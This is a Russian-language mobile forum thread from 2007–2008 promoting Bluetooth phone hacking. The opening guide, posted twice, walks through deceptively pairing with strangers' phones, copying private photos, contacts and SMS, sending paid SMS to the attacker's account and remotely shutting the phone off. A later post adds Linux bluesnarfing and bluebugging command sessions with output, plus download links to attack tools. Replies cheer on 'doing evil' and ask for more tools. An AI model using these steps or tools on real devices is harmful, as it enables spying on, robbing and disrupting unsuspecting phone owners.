Конференция W Mobile Дайджест

Про кардеров и не только - ЧИТАТЬ ВСЕМ! => Взлом мобильных устройств. Инструкция к применению. => Тема начата: Sedoy от 01 Июнь 2007, 18:44:15



Название: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: Sedoy от 01 Июнь 2007, 18:44:15
Цитировать
Наверняка вы слышали о bluehacking, получении доступа к ресурсам Bluetooth устройств. Несмотря на то, что это довольно таки популярная тема, найти более или менее понятную информацию или пример проведения атаки на устройство будет немного затруднительно.
А так бы хотелось почитать, что пишут в sms вон той красивой девчонке, из соседнего подъезда, узнать список контактов начальника на работе, украсть сложнейший пароль от пятизначной аськи друга, который тот из-за склероза сохранил в телефоне. Признайтесь, хотелось бы?  А ведь это далеко не полный список Ваших возможностей!
Если я Вас заинтересовал, читайте дальше..

Intro. Что будем использовать?  
Давайте определимся. Нам нужно, что-то маленькое, не привлекающее внимания и многофункциональное. Значит либо навороченный телефон, либо КПК с поддержкой технологии Bluetooth. Идеален был бы ноутбук, но согласитесь, странно вы бы выглядели с ноутбуком в метро! =)
В моем случае это будет КПК под управлением WM2005.
В качестве боевого софта возьмем отечественную программку «Терминал». Почему?
Для начала из-за её функциональности, и наличия версий под Smartphone 2005,Pocket PC 2003/2005, Smartphone 2003, Smartphone 2003 QVGA. Причем она бесплатна для всех русскоязычных пользователей. И последнее, найти софт с такими же характеристиками под КПК безнадежное дело. Если найдете – поделитесь! (http://www.forum.w-mobile.ru/index.php?action=post;topic=68.0)
В общем, читаем полное описание и забираем отсюда _http://www.wm-soft.com/rus_products/terminal

Устанавливаем и приступаем.
Для начала давайте зайдем в «Опции» > «Настройки».
Назовем наше устройство, например «Введи 0000». Имя, в общем, то можно выбрать любое, в зависимости от обстоятельств. А также выберем, как будет наш КПК определяться на время работы. Поверьте, класс устройства Sony-Ericsson (http://www.w-mobile.ru/article/view/SonyEricsson.html), или Motorola (http://www.w-mobile.ru/article/view/motorola.html) вызовет меньше подозрений, нежели PC.

  • «Подключение» > «Поиск» > «Поиск устройств»
Нашлась жертва.
Сегодня это будет мобильный телефон Nokia (http://www.w-mobile.ru/article/view/Nokia.html) с ником Jertva
1. Сопрягаемся. (Эротичное слово  )
  • «Подключение» > «Отправить» > «Отправить файл»
Ну что нам стоит? Пошлем парочку красивых картинок, мелодий, возможно, какую ни-то игру. Не забываем принимать файлы в ответ. На данном этапе наша задача убедить жертву, что мы не несем никакой угрозы, а просто хотим пообщаться. Через некоторое время нашему оппоненту надоест подтверждать каждое принятие файла, и он сам запросит подключения. Если же нет, то вероятнее всего введет «0000», на наш запрос подключения.
Сопряжение устройств произведено? Мы внутри!

2. Для начала узнаем, что может наша жертва.
  • «Подключение» > «Информация»
Действуем дальше.
  • «Подключение» > «Режим OBEX FTP» > «OBEX FileTransfer»
Вот мы получили доступ к файловой системе телефона. Отсюда мы сохраним только для образовательных целей приватные фотографии, а заодно все, что может оказаться интересным.
  • «Подключение» > «Режим AT» > «Гарнитура»
Теперь подключаемся к тому же телефону в качестве гарнитуры. (Возможно, что этот сервис не даст нам желаемого результата, но у нас в запасе еще много протоколов).
Куда это мы попали?
А попали мы в терминал AT команд.
Поэтому пишем «AT» (без кавычек), и нажимаем послать. Если в ответ пришло OK, продолжаем. Если нет, пробуем подключиться к другим сервисам.
В нашем случае получилось.
Не буду приводить примеров команд, ибо, во-первых, довольно большое их количество уже вшито в программу.

Автор программы, лапочка, уже позаботился о наших нуждах, поэтому заморачиваться с командами мы не будем. А пойдем в «Опции», и быстренько сохраним себе список контактов и SMS. Тем более что это добро, еще и сохраняеться в удобном HTML виде, хоть сразу на сайт вешай.
Правда не знаю, зачем нам контакты, а вот в SMS встречается полезная информация.

Для меркантильных.
Из любого взлома всегда хочется извлечь выгоду, а у нас пока только одни развлечения.
Идем по адресу
  • «Опции» > «СМС» > «Отправить»
И отправляем пару долларов себе в SMS копилку. Которую мы заранее зарегистрировали, например, тут: _http://smskopilka.ru/
При этом на телефоне жертвы, никакой информации о том, куда и что за SMS было отправлено не остается =)

Ну а напоследок, можно и поиздеваться.
  • Посылаем сообщение в виде контакта : «Подключения» > «Отправить» > «Отправить сообщение» «Тебя голубохакнул злобный голубохакер» (А как еще перевести bluehacker?)

  • На прощание, снова зайдем в AT терминал и отправим команду AT+CFUN=0 С помощью, которой выключим жертве телефон. Зачем же сажать батарейку?


З.Ы.: Можете считать все вышеописанное статьей, можете обзором программы «Терминал», а можете просто глупостью. На самом деле я просто хотел показать насколько все это просто, и насколько опасно доверять незнакомым людям. На сем позвольте откланяться, и закончить свое повествование, надеюсь оно было вам интересным.
Инфа: bluexak.info


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: Dr.ZloY от 06 Июнь 2007, 16:33:38
 ;) Парень явно не простой, наш любимый друг Седой.
Господа, читайте ссылки и изучайте данный вопрос, но не взломов ради, а безопасности для ;D.
Помните: Предупреждён - значит вооружён!


Название: Буду чинить зло!
Отправлено: N.1.@.K. от 06 Июнь 2007, 21:20:14
 :o Вещь! Будем пробовать! >:( Буду чинить зло! ;D


Название: Re: Буду чинить зло!
Отправлено: Dr.ZloY от 17 Июль 2007, 14:48:54
:o Вещь! Будем пробовать! >:( Буду чинить зло! ;D

Ну как, каковы результаты?


Название: Re: Буду чинить зло!
Отправлено: Sedoy от 17 Июль 2007, 19:37:02
Ну как, каковы результаты?
ZloY думаешь кто нибудь признается :)
Если молчит, значит - творит!


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: FreeLancer от 22 Август 2007, 10:54:47
У меня Asus A686n wm 5.0 у меня встроенная функция просмотра, удаления и изъятия файлов единственное что у меня не получается-это снять деньги со счёта. Если у меня отображается новое устройство то пишет все его BT-функции. Можно ли найти модуль улучшения к этой программе?


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: Sedoy от 22 Август 2007, 15:17:17
Уважаемый, FreeLancer к сожелению программа Тeрминaл, она же The Real Bluejack, версии 1.0 была выпущена в конце 2006 года, обновлений автор пока не делал, но вы всегда можете обратиться к нему за помощью на его сайте - _http://www.wm-soft.com/rus, страница программы - _http://www.wm-soft.com/rus_products/terminal
;)


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: RMZ от 09 Октябрь 2007, 19:53:38
Приветствую. Поставил я эту прогу под ось WM 2003, но вот беда не запускается она...Кто знает в чем проблема отпишите.


Название: Для работы Программы необходимо...
Отправлено: robot от 09 Октябрь 2007, 20:57:17
Приветствую. Поставил я эту прогу под ось WM 2003, но вот беда не запускается она...Кто знает в чем проблема отпишите.
Для работы Программы необходим Bluetooth стек от Microsoft и .NET Compact Framework 2.0


Название: Re: Для работы Программы необходимо...
Отправлено: Sedoy от 10 Октябрь 2007, 20:01:19
Приветствую. Поставил я эту прогу под ось WM 2003, но вот беда не запускается она...Кто знает в чем проблема отпишите.
Для работы Программы необходим Bluetooth стек от Microsoft и .NET Compact Framework 2.0

Вот ссылка сия чуда: http://download.microsoft.com/download/0/7/2/0728de3a-fa75-413f-b3b6-8050518cef86/NETCFSetupv2.msi


Название: Зачем 38 метров, если на КПК идет только 5?
Отправлено: Sedoy от 10 Октябрь 2007, 20:12:31
Заранее отвечу на этот вопрос во избежание флуда на форуме:
33 мега вшиваются в винду, чтобы разрабы могли использовать эти компоненты для новых прог для КПК. В кпк используются уже скомпилированные функции, место они занимают мало, по сравнению с любыми другими для разработки приложений, которые нужны разрабам.


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: RMZ от 11 Октябрь 2007, 18:49:37
Спасибо Вам. У меня есть еще один вопрос, а что если у меня Bluetooth-стек не от Microsoft, а другой Bluetooth-стэк от Widcomm версии 1.0? Есть ли выход? У меня HP h6340...


Название: Bluetooth-стэк от Widcomm версии 1.0? Есть ли выход?
Отправлено: Sedoy от 11 Октябрь 2007, 19:17:02
Спасибо Вам. У меня есть еще один вопрос, а что если у меня Bluetooth-стек не от Microsoft, а другой Bluetooth-стэк от Widcomm версии 1.0? Есть ли выход? У меня HP h6340...
К этим драйверам никаких претензий нет, тем более что они оснащены отличным «мастером» настройки служб Bluetooth!, но почти все проги реально работают только с MS-ким стеком, можно попробовать обновление Widcomm, проследуйте на сайт Broadcom: http://www.broadcom.com/ Если поможет, отпишитесь ;)


Название: А что если у меня Bluetooth-стек не от Microsoft, а другой от Widcomm?
Отправлено: robot от 11 Октябрь 2007, 19:38:40
Вот ответ:
Разница в том, что Broadcom (она же бывшая Widcomm) поддерживает гораздо больше различных сетевых сервисов, чем Microsoft. Но у Microsoft гораздо большее преимущество - это то, что на нём работает прекраснейшая программа Терминал.  Может в последних драйверах и исправлена эта проблема у Broadcom, ищите обновления, либо сносите Widcomm и ставьте Bluetooth-стек от Microsoft! Удачи!


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: RMZ от 13 Октябрь 2007, 15:14:58
Скачал я это обновление...установить не получается. Выдает ошибку что не найдено блю тус оборудование...Я думаю пора уже забить на это прогу :)
robot а как стек от Windows поставить?


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: robot от 17 Октябрь 2007, 00:08:19
robot а как стек от Windows поставить?
Да шутка это была, поможет только смена железа(покупка нового) ;D


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: Sedoy от 17 Октябрь 2007, 00:14:56
robot а как стек от Windows поставить?
Да шутка это была, поможет только смена железа(покупка нового) ;D
8) Жёстко как-то получилось
Скачал я это обновление...установить не получается. Выдает ошибку что не найдено блю тус оборудование...Я думаю пора уже забить на это прогу :)
robot а как стек от Windows поставить?
Вместо стека Widcomm нельзя поставить стек Microsoft!


Название: Взлом телефонов через BlueTooth (Bluetooth Hack на java)
Отправлено: robot от 17 Октябрь 2007, 01:25:51
Вот рыскал по Рунету и наткнулся я случайно на программу проникновения на чужой мобильный телефон или смартфон через Bluetooth написанную на JAVA.

Возможные действия:
  • - чтение сообщений
  • - чтение записной книжки
  • - изменение profile
  • - изменение Sound
  • - восстановление заводских установок
  • - перезагрузка телефона
  • и т.д.
Размер: 101Kb(zip)
Примечания:
1. При сопряжении устройств используйте код 0000
2. При запуске на смартфонах не забудьте включить bluetooth перед запуском приложения
Вот ссылочка: здесь (http://swapfile.ru/files/11376111615214964/Super_Bluetooth_Hack.rar)


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: Sedoy от 17 Октябрь 2007, 16:51:02
Отличная идея robot. Народ! Если у кого завалялись в закромах, какие либо проги выкладывайте!


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: Zeon от 17 Октябрь 2007, 17:37:21
Отличная идея robot. Народ! Если у кого завалялись в закромах, какие либо проги выкладывайте!
А может раздел открыть? Вот на подобе этого:
http://www.forum.w-mobile.ru/index.php/topic,28.0.html
Народ туда программы бы заливал!


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: Sedoy от 17 Октябрь 2007, 18:27:48
Отличная идея robot. Народ! Если у кого завалялись в закромах, какие либо проги выкладывайте!
А может раздел открыть? Вот на подобе этого:
http://www.forum.w-mobile.ru/index.php/topic,28.0.html
Народ туда программы бы заливал!
Вот: Программы для взлома устройств работающих на BlueTooth! (http://www.forum.w-mobile.ru/index.php/topic,122.0.html)


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: Kira Wingly от 21 Январь 2008, 23:50:02
Цитировать
Наверняка вы слышали о bluehacking, получении доступа к ресурсам Bluetooth устройств. Несмотря на то, что это довольно таки популярная тема, найти более или менее понятную информацию или пример проведения атаки на устройство будет немного затруднительно.
А так бы хотелось почитать, что пишут в sms вон той красивой девчонке, из соседнего подъезда, узнать список контактов начальника на работе, украсть сложнейший пароль от пятизначной аськи друга, который тот из-за склероза сохранил в телефоне. Признайтесь, хотелось бы?  А ведь это далеко не полный список Ваших возможностей!
Если я Вас заинтересовал, читайте дальше..

Intro. Что будем использовать?  
Давайте определимся. Нам нужно, что-то маленькое, не привлекающее внимания и многофункциональное. Значит либо навороченный телефон, либо КПК с поддержкой технологии Bluetooth. Идеален был бы ноутбук, но согласитесь, странно вы бы выглядели с ноутбуком в метро! =)
В моем случае это будет КПК под управлением WM2005.
В качестве боевого софта возьмем отечественную программку «Терминал». Почему?
Для начала из-за её функциональности, и наличия версий под Smartphone 2005,Pocket PC 2003/2005, Smartphone 2003, Smartphone 2003 QVGA. Причем она бесплатна для всех русскоязычных пользователей. И последнее, найти софт с такими же характеристиками под КПК безнадежное дело. Если найдете – поделитесь! (http://www.forum.w-mobile.ru/index.php?action=post;topic=68.0)
В общем, читаем полное описание и забираем отсюда _http://www.wm-soft.com/rus_products/terminal

Устанавливаем и приступаем.
Для начала давайте зайдем в «Опции» > «Настройки».
Назовем наше устройство, например «Введи 0000». Имя, в общем, то можно выбрать любое, в зависимости от обстоятельств. А также выберем, как будет наш КПК определяться на время работы. Поверьте, класс устройства Sony-Ericsson (http://www.w-mobile.ru/article/view/SonyEricsson.html), или Motorola (http://www.w-mobile.ru/article/view/motorola.html) вызовет меньше подозрений, нежели PC.

  • «Подключение» > «Поиск» > «Поиск устройств»
Нашлась жертва.
Сегодня это будет мобильный телефон Nokia (http://www.w-mobile.ru/article/view/Nokia.html) с ником Jertva
1. Сопрягаемся. (Эротичное слово  )
  • «Подключение» > «Отправить» > «Отправить файл»
Ну что нам стоит? Пошлем парочку красивых картинок, мелодий, возможно, какую ни-то игру. Не забываем принимать файлы в ответ. На данном этапе наша задача убедить жертву, что мы не несем никакой угрозы, а просто хотим пообщаться. Через некоторое время нашему оппоненту надоест подтверждать каждое принятие файла, и он сам запросит подключения. Если же нет, то вероятнее всего введет «0000», на наш запрос подключения.
Сопряжение устройств произведено? Мы внутри!

2. Для начала узнаем, что может наша жертва.
  • «Подключение» > «Информация»
Действуем дальше.
  • «Подключение» > «Режим OBEX FTP» > «OBEX FileTransfer»
Вот мы получили доступ к файловой системе телефона. Отсюда мы сохраним только для образовательных целей приватные фотографии, а заодно все, что может оказаться интересным.
  • «Подключение» > «Режим AT» > «Гарнитура»
Теперь подключаемся к тому же телефону в качестве гарнитуры. (Возможно, что этот сервис не даст нам желаемого результата, но у нас в запасе еще много протоколов).
Куда это мы попали?
А попали мы в терминал AT команд.
Поэтому пишем «AT» (без кавычек), и нажимаем послать. Если в ответ пришло OK, продолжаем. Если нет, пробуем подключиться к другим сервисам.
В нашем случае получилось.
Не буду приводить примеров команд, ибо, во-первых, довольно большое их количество уже вшито в программу.

Автор программы, лапочка, уже позаботился о наших нуждах, поэтому заморачиваться с командами мы не будем. А пойдем в «Опции», и быстренько сохраним себе список контактов и SMS. Тем более что это добро, еще и сохраняеться в удобном HTML виде, хоть сразу на сайт вешай.
Правда не знаю, зачем нам контакты, а вот в SMS встречается полезная информация.

Для меркантильных.
Из любого взлома всегда хочется извлечь выгоду, а у нас пока только одни развлечения.
Идем по адресу
  • «Опции» > «СМС» > «Отправить»
И отправляем пару долларов себе в SMS копилку. Которую мы заранее зарегистрировали, например, тут: _http://smskopilka.ru/
При этом на телефоне жертвы, никакой информации о том, куда и что за SMS было отправлено не остается =)

Ну а напоследок, можно и поиздеваться.
  • Посылаем сообщение в виде контакта : «Подключения» > «Отправить» > «Отправить сообщение» «Тебя голубохакнул злобный голубохакер» (А как еще перевести bluehacker?)

  • На прощание, снова зайдем в AT терминал и отправим команду AT+CFUN=0 С помощью, которой выключим жертве телефон. Зачем же сажать батарейку?


З.Ы.: Можете считать все вышеописанное статьей, можете обзором программы «Терминал», а можете просто глупостью. На самом деле я просто хотел показать насколько все это просто, и насколько опасно доверять незнакомым людям. На сем позвольте откланяться, и закончить свое повествование, надеюсь оно было вам интересным.
Инфа: bluexak.info


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: bugai от 25 Январь 2008, 05:05:17
полскажите плз! какие есть проги для ноутбука чтобы телефон(смартфон, коммуникатор) хакнуть???


Название: Bluejacking, Bluesnarfing, Bluebugging
Отправлено: Sedoy от 28 Январь 2008, 00:04:53
полскажите плз! какие есть проги для ноутбука чтобы телефон(смартфон, коммуникатор) хакнуть???
Не искал для ноута, не знаю, пошарь по инету!
Вот примеры (ссылки прям на гуглю):
  • Bluejacking (http://www.google.ru/search?aq=-1&oq=&complete=1&hl=ru&newwindow=1&q=Bluejacking+download&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=) - bluetooth-спам
  • Bluesnarfing (http://www.google.ru/search?aq=-1&oq=&complete=1&hl=ru&newwindow=1&q=Bluesnarfing+download&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=) - более злонамеренный вариант первой атаки. Сможешь не только "увидеть" устройство-жертву со своего терминала, но и получить доступ к файлам, хранящимся на пользовательском устройстве.
  • Bluebugging (http://www.google.ru/search?aq=-1&oq=&complete=1&hl=ru&newwindow=1&q=Bluebugging+download&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=) - наиболее опасный вариант воздействия. Если сможешь обнаружить в пределе доступности связи включенное устройство, то при помощи системных кодов ряда bluetooth-реализаций осуществишь несанкционированную передачу данных или скрыто осуществишь телефонные звонки (если данное устройство является телефоном).

Удачи bugai! Найдёшь, скинь пжл. сюды ;)


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: bugai от 28 Январь 2008, 05:08:57
вот некоторая интересная инфа по хакингу ВТ девайсов.

Bluetooth секурити: тест на прочность


Отбросив историю создания Bluetooth и технические подробности работы, перейду сразу к делу.
Данная статья предполагает наличие у читателя опыта работы с Linux и знания (хотя бы поверхностные) Bluetooth стека.
В прессе всё чаще и чаще стали появляться статьи о недостаточной защищённости Bluetooth соединений и возможностях атак как на сам стек, так и на устройства, на которых он (стек) установлен. В этой небольшой статье я попытаюсь показать как можно реализовать атаку на самые уязвимые модели сотовых телефонов (по данным www.thebunker.net ), а именно Nokia 6310i и Sony Ericsson T610.
Специалисты в области безопасности выделяют несколько типов ошибок в работе Bluetooth, например такие:
• Неправильная обработка длинны пакета OBEX
• Ошибка в проверки целостности пакета OBEX
• Возможность осуществления DoS
• Существует возможность работать с определённым сервисом напрямую (в отдельных устройствах)
• Поддержка работы с AT-командами
На основе этих ошибок существует несколько типов атак, но лично я хочу выделить две: BlueBug и BlueSnarfing.
BlueBug – позволяет получить доступ к выполнению: AT- команд, чтению/записи SMS, чтению/редактированию телефонной книги.
BlueSnarfing – позволяет выкачивать любые данные с устройства начиная от календаря до мультимедийных файлов и есесено управлять телефонной книгой (для сотовых).



Скальпелем по “зубам”.
Для реализации атаки всего лишь необходимо напрямую обратиться к необходимой службе (см. рисунок), а ошибки в реализации протокола приведут к выполнению наших команд на уязвимом устройстве. Попробуем настроить взаимодействие с OBEX и интерпретатором AT-команд в обход системы аутентификации:

\ ищем активные устройства
[root@localhost /]# hcitool scan
Scanning ...
00:0E:07:27:9B:09 Darklight<t610(bj)

\ просматриваем открытые сервисы
[root@localhost /]# sdptool browse 00:0E:07:27:9B:09
Browsing 00:0E:07:27:9B:09
...
\ А вот и сервис передачи/приёма файлов
Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 10
............................................................
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100
.............................................................
Service Name: OBEX Basic Imaging
Service RecHandle: 0x1000b
Service Class ID List:
"" (0x111b)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Profile Descriptor List:
"" (0x111a)
Version: 0x0100
............................................................

\ подключаемся к открытому 10-ому каналу и скачиваем файл…… допустим……. телефонной книги
[root@localhost /]# obexftp -b 00:0E:07:27:9B:09 -B 10 -g telecom/pb.vcf
Browsing 00:0E:07:27:9B:09
Channel: 7
No custom transport
Connecting...bt: 1
done
Receiving
telecom/pb.vcf.../done
Disconnecting...done

Вот и вся атака

Теперь попытаемся получить доступ к выполнению АТ-команд, для этого воспользуемся программой rfcomm для управления пакетами в данном протоколе. Здесь мы попытаемся подключится к параллельному порту сотового.

[root@localhost /]# hcitool scan
Scanning ...
00:63:59:56:3C:F4 Darklight<Nokia 6310i>

\ закрепляем мобильный за rfcomm0 портом
[root@localhost /]# rfcomm bind /dev/rfcomm0 00:63:59:56:3C:F4

\ далее при помощи программы Gnokii или напрямую вводя AT-команды управляем сотовым
[root@localhost /]# cu -l rfcomm0 -s 9600
Connected.
[ATE1]

OK
ATI
Nokia

OK
AT+CPBS?
+CPBS: "SM",0,100

OK
AT+CPBR=?
+CPBR: (1-100),48,18

OK
ATDT+ телефонный номер для набора
OK


Набор софта для bluetooth хакинга

Blooover
Платформа: Телефоны с поддержкой J2ME (с поддержкой MIDP 2.0 и JSR-82 (Bluetooth API))
Download
http://trifinite.org/Downloads/Blooover.jar (http://trifinite.org/Downloads/Blooover.jar)

Blooover J2ME утилита аудита Bluetooth на сотовых телефонах. Позволяет обнаруживать уязвимые телефоны и скачивать из них персональную информацию.
PS: Blooover theme for Series60 phones
Download
http://trifinite.org/Downloads/Blooover_theme.sis (http://trifinite.org/Downloads/Blooover_theme.sis)

BlueZ
Платформа: Linux
Cтек протокола Bluetooth для Linux, разработан в Qualcomm и включён в ядро Linux начиная с версии 2.4.18, но необходима доустановка данного пакета библиотек и утилит. К bluetooth hack'у относится тем, что основные атаки реализуются стандартными средствами.
Данный пакет включает следующие утилиты:
hcitool - сканер Bluetooth (с интерфейсом командной строки), позволяет обнаруживать все устройства, находящееся в открытом режиме. Справку (man) по hcitool можно найти здесь
l2ping - Bluetooth-версия команды "ping"
l2test - утилита для тестирования устройств
hcidump - пакетный снифер, bluetooth-версия утилиты tcpdump
также содержит демоны - hcid, hciemud и конфигурационную утилиту hciconfig
Download
http://x25.com.ru/tools/bt/bluez-1.1.tar.gz (http://x25.com.ru/tools/bt/bluez-1.1.tar.gz)

Bluesniff
Платформа: Linux
Сканер Bluetooth устройств, может работать в двух режимах:
1. Normal Scan - обнаружение только видимых устройств
2. Brute Force Scan - осуществляет перебор по МАС адресам с помошью утилиты redfang и выводит результаты в более понятном формате.
Download
http://www.25.net.ru/tools/bt/bluesniff.tar.gz (http://www.25.net.ru/tools/bt/bluesniff.tar.gz)

Car Whisperer
Платформа: Linux
Небольшое и удобное приложение позволяет принимать и передавать звук на чужие Bluetooth-гарнитуры.
Download
http://www.25.net.ru/tools/bt/carwhisperer-0.1.tar.gz (http://www.25.net.ru/tools/bt/carwhisperer-0.1.tar.gz)

HeloMoto
Платформа: Linux
Позволяет извлекать приватную информацию через bluetooth из ранних моделей телефонов Motorola V-Series.
Работает только со стеком BlueZ.
Download
http://www.25.net.ru/tools/bt/helomoto.tgz (http://www.25.net.ru/tools/bt/helomoto.tgz)

BT Audit
Платформа: Linux
Программа для security-аудита bluetooth устройств.
Download
http://www.25.net.ru/tools/bt/bt_audit-0.1.tar.gz (http://www.25.net.ru/tools/bt/bt_audit-0.1.tar.gz)

BT-Devices Viewer
Версия: 0.16a
Платформа: Windows
BT-Devices Viewer - это программа для ведения журнала найденных с помощью Bluetooth-модуля компьютера устройств с подробной информацией о каждом из них: имя, уникальный MAC-адрес, время нахождения, класс устройства. А главное, программа показывает, какое именно устройство найдено! То есть, не только имя, которое можно изменить на что угодно, а ещё и модель устройства! Теперь такие изощрённые программы как BTClass для PalmOS не скроют истинной сущности Bluetooth телефона, КПК или другого устройства.
Download
http://bluejack.ru/files/windows/BTDevView/BTDevices_0_17a.rar (http://bluejack.ru/files/windows/BTDevView/BTDevices_0_17a.rar)

BlueScanner
Платформа: Windows
Еще один сканер. Так же выводит подробную информацию о найденных устройствах: тип устройства, модель и т.д., плюс список доступных сервисов.
Download
http://www.25.net.ru/tools/bt/BlueScannerSetup_1_1_1_0.zip (http://www.25.net.ru/tools/bt/BlueScannerSetup_1_1_1_0.zip)

BlueSweep
Платформа: Windows
И еще один сканер. Делает тоже что и два предыдущих, плюс должен еще поидее делать аудит уязвимостей устройства.
Download
http://www.airmagnet.com/products/assets/AirMagnet_BlueSweep_Setup.exe (http://www.airmagnet.com/products/assets/AirMagnet_BlueSweep_Setup.exe)

Blooover II
Платформа: Телефоны с поддержкой J2ME (с поддержкой MIDP 2.0 и JSR-82 (Bluetooth API))
Download
http://trifinite.org/Downloads/Blooover2.jar (http://trifinite.org/Downloads/Blooover2.jar)
http://trifinite.org/Downloads/Blooover2b.jar (http://trifinite.org/Downloads/Blooover2b.jar)

Btscanner 2.1
Платформа: Linux
btscanner - инструмент, разработанный специально для того, чтобы извлечь как можно больше информации о Bluetooth устройстве до процесса соединения. Детальные информационный экран извлекает информацию из HCI и SDP и поддерживает открытое подключение для контроля RSSI.
btscanner основан на BlueZ Bluetooth стеке (недавно включённый в ядро Linux) и BlueZ пакете сервисных программ .
btscanner также содержит полный листинг IEEE OUI номеров и таблицу поиска классов. При использовании информации, собранной из этих источников, возможно делать выводы относительно типа Bluetooth устройства.

Вторая версия известной утилиты для взлома сотовых, Blooover. Теперь кроме атаки BlueBug включает реализацию атаки HeloMoto, BlueSnarf и возможность посылать malformed объекты через OBEX.
Download
http://www.25.net.ru/tools/bt/btscanner-2.1.tar.bz2 (http://www.25.net.ru/tools/bt/btscanner-2.1.tar.bz2)

BTScanner for XP
Платформа: Windows
Версия btscanner для Windows XP. Для запуска необходимы bluecove libraries (JSR-82 Bluetooth API for Java) и сама Java.
Download
http://www.25.net.ru/tools/bt/btscanner_1_0_0.zip (http://www.25.net.ru/tools/bt/btscanner_1_0_0.zip)

BlueDiving
Платформа: Linux
Универсальный набор bluetooth-хакера! Утилита из серии "all in one". Реализует все известные на сегодняшний день атаки на блутус устройства: BlueBug, bluesnarf, bluesnarf++, bluesmack, спуфинг mac-адреса, etc.
Работает со стеком BlueZ.
[Bluediving 0.3]
http://www.25.net.ru/tools/bt/bluediving-0.3.tgz (http://www.25.net.ru/tools/bt/bluediving-0.3.tgz)
[Bluediving 0.5]
http://www.25.net.ru/tools/bt/bluediving-0.5.tgz.gz (http://www.25.net.ru/tools/bt/bluediving-0.5.tgz.gz)
PSM scan V 0.3
Платформа: Linux
Очень простой инструмент, чтобы просмотреть все L2CAP PSMs, чтобы найти открытый PSMs (которые не перечислены в SDP базе данных), эту программу можно называть bluetooth сканером портов
Download
http://www.betaversion.net/btdsd/psm_scan.tar.gz (http://www.betaversion.net/btdsd/psm_scan.tar.gz)
Redfang - The Bluetooth Hunter
Платформа: Linux
Redfang v2.5 - усовершенствованная версия, способная находит неподдающиеся обнаружению Bluetooth устройства путём подбора последних шести байт адреса устройства и выполнять функцию read_remote_name (). Эта новая версия с улучшенным программным кодом перечисляет сервисную информацию и поддерживает многопользовательский режим и способна поддерживать высокую скорость в передаче при этом режиме (максимальный теоретический предел 127 USB устройства). Этот выпуск Redfang был создан в сотрудничестве с QinetiQ, как часть их работы в DTI Next Wave Technologies project FORWARD.
Download
http://www.atstake.com/research/tools/info...fang.2.5.tar.gz  (http://www.atstake.com/research/tools/info...fang.2.5.tar.gz)

Софт под Nokia 770 tablet PC


HeloMoto-Maemo
http://trifinite.org/Downloads/helomoto-maemo.tgz (http://trifinite.org/Downloads/helomoto-maemo.tgz)

BlueSerial-Maemo
http://trifinite.org/Downloads/blueserial-maemo.tgz (http://trifinite.org/Downloads/blueserial-maemo.tgz)

BlueZObex-Maemo
http://trifinite.org/Downloads/bluez-obex-maemo.tgz (http://trifinite.org/Downloads/bluez-obex-maemo.tgz)

Gnokii-Maemo
http://trifinite.org/Downloads/gnokii-0.6.9-maemo.tgz (http://trifinite.org/Downloads/gnokii-0.6.9-maemo.tgz)


От себя хочу сказать ОГРОМНОЕ СПАСИБО за предоставленную информацию сайту http://x25.com.ru (http://x25.com.ru)


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: jubrail от 03 Март 2008, 22:31:47
скиньте пожалуйста мне на jubrail@mail.ru программу для телефона Nokia 7390 для того чтобы взламывать другие телефоны через BT. кто скинет с тем сочтемся!!!!!!!!!!! :)


Название: Re: Полноценный взлом любого устройства работающего на BlueTooth!
Отправлено: Капитан Смоллетт от 20 Март 2008, 03:41:53
скиньте пожалуйста мне на jubrail@mail.ru программу для телефона Nokia 7390 для того чтобы взламывать другие телефоны через BT. кто скинет с тем сочтемся!!!!!!!!!!! :)
М-дя, смотрю в книгу и вижу фигу :-))